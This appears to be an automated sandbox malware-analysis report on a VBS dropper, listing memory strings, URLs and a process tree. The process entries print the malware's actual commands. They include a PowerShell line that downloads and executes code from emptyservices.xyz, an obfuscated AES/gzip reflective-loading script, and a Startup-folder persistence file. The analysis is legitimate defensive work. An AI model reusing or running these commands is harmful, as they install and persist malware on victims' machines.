Source: | Binary string: \??\C:\Windows\dll\System.Core.pdbb%R source: powershell.exe, 0000001D.00000002.2782843714.0000020CF10FD000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\Microsoft.Powershell.PSReadline.pdbpdbine.pdb source: powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: omation.pdbJ source: powershell.exe, 0000000D.00000002.2425636470.0000025C60164000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.Powershell.PSReadline.pdb* source: powershell.exe, 00000014.00000002.2659859163.000001F3AE590000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb7 source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FDFF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2423231482.0000025C5FDFF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2782843714.0000020CF10FD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2787244921.0000020CF1482000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb; source: powershell.exe, 0000001D.00000002.2782843714.0000020CF112E000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDB source: powershell.exe, 0000001D.00000002.2782843714.0000020CF112E000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2782843714.0000020CF112E000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000003.00000002.1764714970.000001D0F57E4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: omation.pdb\s' source: powershell.exe, 00000014.00000002.2662631561.000001F3AE856000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdbx source: powershell.exe, 00000014.00000002.2659859163.000001F3AE590000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactivene.PDB source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\Microsoft.Powershell.PSReadline.pdb` source: powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Core.pdb00525341310004000001000100b5fc90e7027f67871e773a8fde8938c81dd402ba65b9201d60593e96c492651e889cc13f1415ebb53fac1131ae0bd333c5ee6021672d9718ea31a8aebd0da0072f25d87dba6fc90ffd598ed4da35e44c398c454307e8e33b8426143daec9f596836f97c8f74750e5975c64e2189f0 source: powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\Z:\syscalls\amsi_trace64.amsi.csv.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: omation.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C60164000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb]%K source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: sn.pdb source: powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdbowW source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2782843714.0000020CF10FD000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\Z:\syscalls\amsi64_7184.amsi.csve.pdb(V source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ows\dll\mscorlib.pdb source: powershell.exe, 00000003.00000002.1764714970.000001D0F58B6000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb001000100b5fc90e7027f67871e773a8fde8938c81dd402ba65b9201d60593e96c492651e889cc13f1415ebb53fac1131ae0bd333c5ee6021672d9718ea31a8aebd0da0072f25d87dba6fc90ffd598ed4da35e44c398c454307e8e33b8426143daec9f596836f97c8f74750e5975c64e2189f source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: e.pdb source: powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FDFF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2787244921.0000020CF1482000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: softy.pdb source: powershell.exe, 00000003.00000002.1764714970.000001D0F57E4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: omation.pdb.s source: powershell.exe, 00000014.00000002.2662631561.000001F3AE856000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdbT source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2782843714.0000020CF112E000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: .pdbq source: powershell.exe, 0000001D.00000002.2782843714.0000020CF112E000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Core.pdb? source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbZ] source: powershell.exe, 0000001D.00000002.2787244921.0000020CF1430000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdbF source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FDFF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1764714970.000001D0F58B6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.Powershell.PSReadline.pdb37-8B11-F424491E3931}\InprocServer320805 source: powershell.exe, 00000014.00000002.2491608753.000001F39452D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\System.Core.pdby source: powershell.exe, 00000014.00000002.2659859163.000001F3AE590000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ws\System.Core.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\System.Management.Automation.pdbs% source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2659859163.000001F3AE590000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2782843714.0000020CF10FD000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdb189>K source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb29; source: powershell.exe, 00000014.00000002.2662631561.000001F3AE80A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 0000000D.00000002.2423231482.0000025C5FEBF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2659859163.000001F3AE590000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Core.pdb source: powershell.exe, 0000000D.00000002.2425636470.0000025C60164000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.Powershell.PSReadline.pdb37-8B11-F424491E3931}\InprocServer3281dd402ba65b9201d60593e96c492651e889cc13f1415ebb53fac1131ae0bd333c5ee6021672d9718ea31a8aebd0da0072f25d87dba6fc90ffd598ed4da35e44c398c454307e8e33b8426143daec9f596836f97c8f74750e5975c64e2189f source: powershell.exe, 0000000D.00000002.2425636470.0000025C600F0000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Core.pdbf source: powershell.exe, 00000014.00000002.2662631561.000001F3AE856000.00000004.00000020.00020000.00000000.sdmp |
Source: powershell.exe, 00000003.00000002.1759342843.000001D0901B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1742529866.000001D08194B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1759342843.000001D090076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2417006944.0000025C57FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2417006944.0000025C57E7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C49A03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C480CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2637178911.000001F3A657B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3981F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2637178911.000001F3A66B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3967CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CD9384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2762765196.0000020CE904C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2762765196.0000020CE9183000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000001D.00000002.2597422708.0000020CDAB97000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000003.00000002.1742529866.000001D080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C47DF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3964F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CD8FC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 0000000D.00000002.2362046480.0000025C497B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F397EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CDA98C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 |
Source: powershell.exe, 0000001D.00000002.2597422708.0000020CDAB97000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000003.00000002.1742529866.000001D080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C47DF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3964F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CD8FC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 0000001D.00000002.2597422708.0000020CDABF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000001D.00000002.2597422708.0000020CDABF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000001D.00000002.2597422708.0000020CDABF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000003.00000002.1742529866.000001D081341000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://emptyservices.xyz |
Source: powershell.exe, 00000003.00000002.1742529866.000001D081778000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://emptyservices.xyz/stub |
Source: powershell.exe, 00000003.00000002.1764714970.000001D0F58A4000.00000004.00000020.00020000.00000000.sdmp, 7299_output.vbs | String found in binary or memory: https://emptyservices.xyz/stub.txt |
Source: powershell.exe, 0000001D.00000002.2597422708.0000020CDAB97000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000003.00000002.1742529866.000001D080C2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C48D2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F397940000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CD9EFD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000003.00000002.1759342843.000001D0901B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1742529866.000001D08194B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1759342843.000001D090076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2417006944.0000025C57FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2417006944.0000025C57E7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C49A03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2362046480.0000025C480CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2637178911.000001F3A657B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3981F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2637178911.000001F3A66B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F3967CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CD92A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2762765196.0000020CE904C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2762765196.0000020CE9183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CDABF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 0000000D.00000002.2362046480.0000025C497B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F397EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CDA98C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org |
Source: powershell.exe, 0000000D.00000002.2362046480.0000025C497B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2495584075.000001F397EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2597422708.0000020CDA98C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7299_output.vbs" | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })" | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" " | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\c.bat" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\c.bat';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); " | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); " | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /nobreak /t 1 | |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd" " | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
